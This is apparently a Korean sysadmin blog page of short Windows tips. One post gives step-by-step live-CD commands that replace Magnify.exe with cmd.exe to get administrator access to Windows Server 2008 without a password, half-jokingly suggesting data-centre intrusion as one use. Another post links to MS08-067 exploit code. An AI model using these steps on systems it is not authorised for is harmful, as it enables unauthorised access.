System & Develop/WINDOWS2010. 2. 26. 11:09
시스템 점검 중 특정 프로세스가 어떤 포트와 연결되었는지 체크하고 싶을 때가 있습니다.
기본 명령어인 netstat 를 통해서 연결된 프로세스 및 포트를 확인 할 수 있습니다.

netstat -b -v



출처 : http://hummingbird.tistory.com/1888
Posted by basaaja
System & Develop/WINDOWS2009. 2. 13. 08:09
간혹 로컬에서 인증이 필요 없이 Windows Server 2008에 접근을 할 이유가 생길 수 있습니다. 전 관리자가 패스워드를 알려 주지 않고 나갔다던지 아니면 나쁜짓을 하기 위해 IDC에 침입(?) 해서 작업을 하시던지 여러 이유들은 많이 있겠죠.

아래의 방법은 암호 인증을 우회하는 방법에 대한 매우 짧은 번역글 입니다.

준비물 : NTFS-3G 드라이버를 제공하는 리눅스 라이브 시디

1. 리눅스 라이브 시디로 부팅을 합니다.
2. fdisk -l | grep NTFS ( NTFS를 제대로 인식했는지 확인 및 몇번 hdd 인지 체크)
3. mkdir -p /mnt/windows (마운트를 위한 디렉토리 생성)
4. mount -t ntfs-3g /dev/sda1/mnt/windows
5. cd /mnt/windows/system32/
6. mv Magnify.exe Magnify.bck
7. cp cmd.exe Magnify.exe
8. reboot

다시 Windows Server 2008 로 접근 하면 인증없이 관리자 권한으로 접근하는 것을 확인 할 수 있다고 합니다 .

참고로 저는 아직 테스트를 하지는 않았고 원본 문서에 접근하시면 더 자세한 설명을 확인 하실 수 있습니다.

원본 : http://milw0rm.com/papers/286

Posted by basaaja
System & Develop/WINDOWS2008. 10. 24. 16:33
Server Service를 이용한 원격 공격 코드가 떠서 MS에서 긴급으로 패치를 제공했습니다.

TCP  139, 445 포트를 방화벽단에서 차단 하시던가 (설마 열어두시는 분은 없겠죠 ..)

아래의 긴급 업데이트를 적용하셔야 합니다.

업데이트 : http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
자료 내용 : http://www.krcert.or.kr/secureNoticeView.do?num=287&seq=-1

공격 코드도 떴습니다.

http://www.milw0rm.com/exploits/6824
Posted by basaaja
System & Develop/WINDOWS2008. 10. 21. 10:28
Adsutil.vbs set /MSFTPSVC/PassivePortRange "40000-50000 "

포트의 범위는 생각보다 크게 열어 줘야 하며 IPSEC이나 방화벽단에서도 해당 포트를

오픈 해줘야 합니다.

Event ID 7023이 발생 하면 아래의 주소를 참고 하세요 ,

http://support.microsoft.com/kb/327649
Posted by basaaja